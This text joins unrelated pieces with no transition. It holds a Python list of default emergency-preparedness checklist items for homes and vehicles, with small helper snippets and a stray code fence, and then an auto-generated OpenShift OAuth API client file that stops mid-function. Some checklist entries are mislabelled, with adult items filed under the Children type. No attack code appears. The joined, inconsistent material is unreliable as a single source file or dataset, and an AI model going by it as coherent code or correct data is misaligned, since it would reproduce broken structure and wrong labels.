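# Hypothetical helper (assumption): scale 'quantityfactor' by household size
# for per-individual items, leave it as-is for per-location items.
def needed_quantity(item, num_people):
    factor = int(item['quantityfactor'])
    if item['pertype'] == 'individual':
        return factor * num_people      # scales with the number of people
    return factor                       # 'location': one allotment per site

water = {'name': 'Water', 'quantityfactor': '7', 'pertype': 'individual'}
kit = {'name': 'First Aid Kit - Large', 'quantityfactor': '1', 'pertype': 'location'}
assert needed_quantity(water, 4) == 28  # 7 gallons per person for four people
assert needed_quantity(kit, 4) == 1     # one kit per location, regardless
```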
DEFAULT_ITEMS = [
{'checklisttype':'Home','name':'Toys (Children)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'1','pertype':'individual','quantityunit':'toy','expiryfactor':'365'},
{'checklisttype':'Home','name':'Snacks (Children)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'7','pertype':'individual','quantityunit':'snacks','expiryfactor':'180'},
{'checklisttype':'Home','name':'Warm Clothes (Children)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'7','pertype':'individual','quantityunit':'clothes','expiryfactor':'180'},
{'checklisttype':'Home','name':'Sturdy Shoes (Adults)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'1','pertype':'individual','quantityunit':'pair','expiryfactor':'180'},
{'checklisttype':'Home','name':'Coats (Children)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'1','pertype':'individual','quantityunit':'coat','expiryfactor':'180'},
{'checklisttype':'Home','name':'Comfort Items (Children)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'1','pertype':'individual','quantityunit':'item(s)','expiryfactor':'180'},
{'checklisttype':'Home','name':'Warm Blanket (Adults)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'1','pertype':'individual','quantityunit':'blanket(s)','expiryfactor':'180'},
{'checklisttype':'Home','name':'Non-perishable food','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'7','pertype':'individual','quantityunit':'days','expiryfactor':'180'},
{'checklisttype':'Home','name':'Water','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'7','pertype':'individual','quantityunit':'gallons','expiryfactor':'180'},
{'checklisttype':'Home','name':'First Aid Kit - Large','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'large kit','expiryfactor':'180'},
{'checklisttype':'Home','name':'Flashlight & batteries (unless wind-up)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'individual','quantityunit':'flashlight','expiryfactor':'180'},
{'checklisttype':'Home','name':'Lantern ','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'lantern','expiryfactor':'180'},
{'checklisttype':'Home','name':'Camping Stove / Propane BBQ','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'stove','expiryfactor':'180'},
{'checklisttype':'Home','name':'Radio (wind-up or with extra batteries)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'radio','expiryfactor':'180'},
{'checklisttype':'Home','name':'Emergency Phone Number List','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'list','expiryfactor':'180'},
{'checklisttype':'Home','name':'Bar soap','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'individual','quantityunit':'bar','expiryfactor':'365'},
{'checklisttype':'Home','name':'Hand Sanitizer','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'individual','quantityunit':'large pump bottle','expiryfactor':'365'},
{'checklisttype':'Home','name':'Paper Towels','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'individual','quantityunit':'roll','expiryfactor':'730'},
{'checklisttype':'Home','name':'Make it Through List','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'list','expiryfactor':'365'},
{'checklisttype':'Home','name':'Manual Can Opener','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'opener','expiryfactor':'365'},
{'checklisttype':'Home','name':'Fire Extinguisher','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'extinguisher','expiryfactor':'365'},
{'checklisttype':'Home','name':'Wrench or Gas Shut-Off tool','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'tool','expiryfactor':'365'},
{'checklisttype':'Home','name':'Waterproof Matches or Magnesium Fire Starter','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'box','expiryfactor':'365'},
{'checklisttype':'Home','name':'Formula','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'7','pertype':'individual','quantityunit':'days','expiryfactor':'180'},
{'checklisttype':'Home','name':'Diapers','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'42','pertype':'individual','quantityunit':'diapers','expiryfactor':'180'},
{'checklisttype':'Home','name':'Baby Wipes (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'2','pertype':'individual','quantityunit':'packs','expiryfactor':'180'},
{'checklisttype':'Home','name':'Baby Food','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'7','pertype':'individual','quantityunit':'days','expiryfactor':'180'},
{'checklisttype':'Home','name':'Diaper Rash Ointment (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'tube','expiryfactor':'180'},
{'checklisttype':'Home','name':'Toys (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'toy','expiryfactor':'180'},
{'checklisttype':'Home','name':'Warm Clothes (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'7','pertype':'individual','quantityunit':'pieces of clothing','expiryfactor':'180'},
{'checklisttype':'Home','name':'Sturdy Shoes (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'pair','expiryfactor':'180'},
{'checklisttype':'Home','name':'Coats (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'coat','expiryfactor':'180'},
{'checklisttype':'Home','name':'Comfort Items (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'item','expiryfactor':'180'},
{'checklisttype':'Home','name':'Pacifier','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'2','pertype':'individual','quantityunit':'pacifiers','expiryfactor':'180'},
{'checklisttype':'Home','name':'Bottles','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'bottles','expiryfactor':'180'},
{'checklisttype':'Home','name':'Warm Blanket (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'blanket(s)','expiryfactor':'180'},
#{'checklisttype':'Home','name':'Nursing Items (e.g. nursing pads, nipple cream/shield)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'location','quantityunit':'item','expiryfactor':'180'},
{'checklisttype':'Home','name':'Feminine Hygiene Products','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Personal','quantityfactor':'1','pertype':'individual','quantityunit':'box','expiryfactor':'180'},
{'checklisttype':'Home','name':'Birth Control','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Personal','quantityfactor':'1','pertype':'individual','quantityunit':'month supply','expiryfactor':'365'},
{'checklisttype':'Home','name':'Prescription Medication & Glasses','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Personal','quantityfactor':'1','pertype':'individual','quantityunit':'month supply','expiryfactor':'365'},
{'checklisttype':'Home','name':'Games','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Personal','quantityfactor':'1','pertype':'individual','quantityunit':'game','expiryfactor':'365'},
{'checklisttype':'Home','name':'Personal Documents','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Personal','quantityfactor':'1','pertype':'individual','quantityunit':'file','expiryfactor':'365'},
{'checklisttype':'Home','name':'Books','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Personal','quantityfactor':'1','pertype':'individual','quantityunit':'book','expiryfactor':'365'},
{'checklisttype':'Home','name':'Litter box, litter, litter scoop and garbage bags','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'clean-up supply','expiryfactor':'365'},
{'checklisttype':'Home','name':'Sturdy leashes, harnesses and carriers','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'leash & carrier','expiryfactor':'365'},
{'checklisttype':'Home','name':'Collar and Licensing Tags','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'item','expiryfactor':'365'},
{'checklisttype':'Home','name':'Toys (Pets)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'toy','expiryfactor':'365'},
{'checklisttype':'Home','name':'Pet Food','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'7','pertype':'individual','quantityunit':'days','expiryfactor':'365'},
{'checklisttype':'Home','name':'Water (Pets)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'gallon(s)','expiryfactor':'365'},
{'checklisttype':'Home','name':'Medication, medical records and veterinarian\'s details','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'month supply','expiryfactor':'365'},
{'checklisttype':'Home','name':'Current photo & description of your pets','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'photo/description','expiryfactor':'365'},
{'checklisttype':'Home','name':'Diapers / Pull-ups','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'21','pertype':'individual','quantityunit':'diapers','expiryfactor':'180'},
{'checklisttype':'Home','name':'Baby Wipes (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'pack(s)','expiryfactor':'180'},
{'checklisttype':'Home','name':'Diaper Rash Ointment (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'tube','expiryfactor':'180'},
{'checklisttype':'Home','name':'Toys (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'toy','expiryfactor':'180'},
{'checklisttype':'Home','name':'Snacks (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'14','pertype':'individual','quantityunit':'snack','expiryfactor':'180'},
{'checklisttype':'Home','name':'Warm Clothes (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'7','pertype':'individual','quantityunit':'outfits','expiryfactor':'180'},
{'checklisttype':'Home','name':'Sturdy Shoes (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'pair','expiryfactor':'180'},
{'checklisttype':'Home','name':'Coats (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'coat','expiryfactor':'180'},
{'checklisttype':'Home','name':'Comfort Items (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'item','expiryfactor':'180'},
{'checklisttype':'Home','name':'Warm Blanket (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'blanket(s)','expiryfactor':'180'},
{'checklisttype':'Home','name':'Wood','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'month supply','expiryfactor':'365'},
{'checklisttype':'Home','name':'Cash','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'100','pertype':'location','quantityunit':'dollars','expiryfactor':'180'},
{'checklisttype':'Home','name':'Tent','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'item','expiryfactor':'365'},
{'checklisttype':'Home','name':'Tarp','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'item','expiryfactor':'365'},
{'checklisttype':'Home','name':'Warm Clothes (Adults)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'2','pertype':'individual','quantityunit':'outfit','expiryfactor':'365'},
{'checklisttype':'Home','name':'Tools','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'toolbox','expiryfactor':'365'},
{'checklisttype':'Home','name':'Phone Charger (including USB)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'individual','quantityunit':'charger','expiryfactor':'365'},
{'checklisttype':'Home','name':'Underwear','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'individual','quantityunit':'pack','expiryfactor':'365'},
{'checklisttype':'Home','name':'Batteries','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'variety pack','expiryfactor':'365'},
{'checklisttype':'Vehicle','name':'Jumper Cables','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'set','expiryfactor':'730'},
{'checklisttype':'Vehicle','name':'Seat Belt Cutter','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'tool','expiryfactor':'730'},
{'checklisttype':'Vehicle','name':'Power Inverter','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'tool','expiryfactor':'365'},
{'checklisttype':'Vehicle','name':'Window Breaker','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'tool','expiryfactor':'730'},
{'checklisttype':'Vehicle','name':'Snacks (Vehicle)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'7','pertype':'individual','quantityunit':'snacks','expiryfactor':'180'},
{'checklisttype':'Vehicle','name':'Warm Blanket (Vehicle)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'individual','quantityunit':'blanket(s)','expiryfactor':'180'},
{'checklisttype':'Vehicle','name':'Coats (Vehicle)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'individual','quantityunit':'jacket','expiryfactor':'180'},
{'checklisttype':'Vehicle','name':'Paper Map','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'map','expiryfactor':'365'},
{'checklisttype':'Vehicle','name':'Flares','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'set','expiryfactor':'365'},
{'checklisttype':'Home','name':'Whistle','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'individual','quantityunit':'whistle','expiryfactor':'365'},
{'checklisttype':'Home','name':'Shovel','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'shovel','expiryfactor':'365'},
{'checklisttype':'Home','name':'Bucket','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'bucket','expiryfactor':'365'},
{'checklisttype':'Home','name':'Heavy Duty Trashbags','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'box','expiryfactor':'365'},
{'checklisttype':'Home','name':'Toilet Paper','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'individual','quantityunit':'roll','expiryfactor':'365'},
{'checklisttype':'Home','name':'TV is secured','checklistitemdescription':'with velcro, pad, straps, or locks','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'Computer is secured','checklistitemdescription':'with velcro, pad, straps, or locks','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'Bookcase is secured to the wall','checklistitemdescription':'using nylon strap','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'Large cabinet is secured to the wall','checklistitemdescription':'using nylon strap','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'No objects are placed above sofas and beds','checklistitemdescription':'framed pictures, mirrors, etc.','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'Exits are clear of obstruction','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'Functioning smoke alarms and knowing how and how often to test them','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'Having an in-date fire extinguisher','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'No overcharged plugs','checklistitemdescription':'no multiplugs plugged into multiplugs','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'}
]
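The entries above share a uniform schema: a `quantityfactor` that is scaled per `pertype` (`individual` vs. `location`) and expressed in `quantityunit`. As a minimal sketch of how such records might be consumed, the helper below computes a required quantity for a household; the function name and the scaling rule are assumptions inferred from the fields, not part of the dataset itself.

```python
def required_quantity(item, household_size):
    """Scale a checklist entry's quantityfactor by household size.

    Assumed rule: 'individual' items scale with the number of people,
    while 'location' items need one allotment per home/vehicle.
    """
    factor = int(item['quantityfactor'])
    if item['pertype'] == 'individual':
        return factor * household_size
    return factor  # 'location': one allotment regardless of household size


# Example with a record shaped like the entries above:
pet_food = {'checklisttype': 'Home', 'name': 'Pet Food',
            'quantityfactor': '7', 'pertype': 'individual',
            'quantityunit': 'days'}
# required_quantity(pet_food, 2) gives 14 (days of food for two pets)
```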
# openshift/client/apis/oauth_openshift_io_v1_api.py
# from flaper87/openshift-restclient-python (Apache-2.0)
# coding: utf-8
"""
OpenShift API (with Kubernetes)
OpenShift provides builds, application lifecycle, image content management, and administrative policy on top of Kubernetes. The API allows consistent management of those objects. All API operations are authenticated via an Authorization bearer token that is provided for service accounts as a generated secret (in JWT form) or via the native OAuth endpoint located at /oauth/authorize. Core infrastructure components may use client certificates that require no authentication. All API operations return a 'resourceVersion' string that represents the version of the object in the underlying storage. The standard LIST operation performs a snapshot read of the underlying objects, returning a resourceVersion representing a consistent version of the listed objects. The WATCH operation allows all updates to a set of objects after the provided resourceVersion to be observed by a client. By listing and beginning a watch from the returned resourceVersion, clients may observe a consistent view of the state of one or more objects. Note that WATCH always returns the update after the provided resourceVersion. Watch may be extended a limited time in the past - using etcd 2 the watch window is 1000 events (which on a large cluster may only be a few tens of seconds) so clients must explicitly handle the \"watch to old error\" by re-listing. Objects are divided into two rough categories - those that have a lifecycle and must reflect the state of the cluster, and those that have no state. Objects with lifecycle typically have three main sections: * 'metadata' common to all objects * a 'spec' that represents the desired state * a 'status' that represents how much of the desired state is reflected on the cluster at the current time Objects that have no state have 'metadata' but may lack a 'spec' or 'status' section. Objects are divided into those that are namespace scoped (only exist inside of a namespace) and those that are cluster scoped (exist outside of a namespace). 
A namespace scoped resource will be deleted when the namespace is deleted and cannot be created if the namespace has not yet been created or is in the process of deletion. Cluster scoped resources are typically only accessible to admins - resources like nodes, persistent volumes, and cluster policy. All objects have a schema that is a combination of the 'kind' and 'apiVersion' fields. This schema is additive only for any given version - no backwards incompatible changes are allowed without incrementing the apiVersion. The server will return and accept a number of standard responses that share a common schema - for instance, the common error type is 'unversioned.Status' (described below) and will be returned on any error from the API server. The API is available in multiple serialization formats - the default is JSON (Accept: application/json and Content-Type: application/json) but clients may also use YAML (application/yaml) or the native Protobuf schema (application/vnd.kubernetes.protobuf). Note that the format of the WATCH API call is slightly different - for JSON it returns newline delimited objects while for Protobuf it returns length-delimited frames (4 bytes in network-order) that contain a 'versioned.Watch' Protobuf object. See the OpenShift documentation at https://docs.openshift.org for more information.
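    The list-then-watch contract described above (a WATCH returns updates strictly after the supplied resourceVersion, and an expired watch window must be handled by re-listing) can be sketched generically. Note this is an illustrative pattern only: `list_fn`, `watch_fn`, and `WatchExpired` are hypothetical stand-ins, not part of this generated client.

    ```python
    class WatchExpired(Exception):
        """Raised when the requested resourceVersion fell out of the watch window."""


    def watch_with_relist(list_fn, watch_fn, max_relists=3):
        """Yield watch events, re-listing whenever the watch window expires."""
        for _ in range(max_relists):
            snapshot = list_fn()  # consistent snapshot read of the collection
            resource_version = snapshot["metadata"]["resourceVersion"]
            try:
                # watch_fn yields only updates made *after* resource_version
                for event in watch_fn(resource_version):
                    yield event
                return
            except WatchExpired:
                continue  # snapshot too old ("watch to old error"): re-list
        raise RuntimeError("watch kept expiring; giving up")
    ```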
OpenAPI spec version: v3.6.0-alpha.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from kubernetes.client.configuration import Configuration
from ..api_client import ApiClient
class OauthOpenshiftIoV1Api(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_oauth_openshift_io_v1_o_auth_access_token(self, body, **kwargs):
"""
create an OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_access_token(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthAccessToken body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAccessToken
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_oauth_openshift_io_v1_o_auth_access_token_with_http_info(body, **kwargs)
else:
(data) = self.create_oauth_openshift_io_v1_o_auth_access_token_with_http_info(body, **kwargs)
return data
def create_oauth_openshift_io_v1_o_auth_access_token_with_http_info(self, body, **kwargs):
"""
create an OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_access_token_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthAccessToken body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAccessToken
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_oauth_openshift_io_v1_o_auth_access_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_oauth_openshift_io_v1_o_auth_access_token`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAccessToken',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_oauth_openshift_io_v1_o_auth_authorize_token(self, body, **kwargs):
"""
create an OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_authorize_token(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthAuthorizeToken body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAuthorizeToken
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(body, **kwargs)
else:
(data) = self.create_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(body, **kwargs)
return data
def create_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(self, body, **kwargs):
"""
create an OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthAuthorizeToken body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAuthorizeToken
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_oauth_openshift_io_v1_o_auth_authorize_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_oauth_openshift_io_v1_o_auth_authorize_token`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAuthorizeToken',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_oauth_openshift_io_v1_o_auth_client(self, body, **kwargs):
"""
create an OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_client(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthClient body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClient
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
